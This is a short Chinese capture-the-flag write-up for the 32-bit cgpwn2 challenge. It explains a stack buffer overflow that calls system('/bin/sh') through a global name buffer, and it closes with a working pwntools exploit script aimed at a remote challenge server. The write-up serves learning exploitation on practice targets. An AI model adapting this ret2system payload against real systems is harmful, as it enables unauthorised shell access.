PWN手的成长之路-20-cgpwn2

file，checksec:

main 函数：

hello 函数：

name 中可以保存字符串，因此我们在 name 中输入 /bin/sh，那么我们就可以利用变量 name 的内存地址，得到 system('/bin/sh')，从而得到shell。

pwn 函数（存在system）：

溢出大小为：0x26+4

我本来在ROPgadget中找到了 sh 字符串，但是一直无法成功得到shell，之后查看才得知，这个sh并不是单纯的 sh。草率了。但是不知道为什么 ciscn_2019_ne_5 可以跑通。求师傅指教。

payload加入main函数，原因：32位和64位的结构不同，32位调用一个函数需要返回地址，之后再调用其他的进行传参，而且32位是用栈传递参数的，而64为使用比如rdi，rsi等寄存器进行传参，因此需要插入一个 main 函数作为返回地址。

利用exp：

from pwn import *

#start 
r = remote('61.147.171.35',63069)
context.log_level = 'debug'
elf = ELF('./pwn')

#params
#system_addr = 0x8048420
system_addr = elf.sym['system']
main_addr = elf.sym['main']
name_addr = elf.sym['name']

#attack
payload = b'a'*(0x26+4) + p32(system_addr) + p32(main_addr) + p32(name_addr)
r.sendlineafter(b'name',b'/bin/sh')
r.sendline(payload)
r.interactive()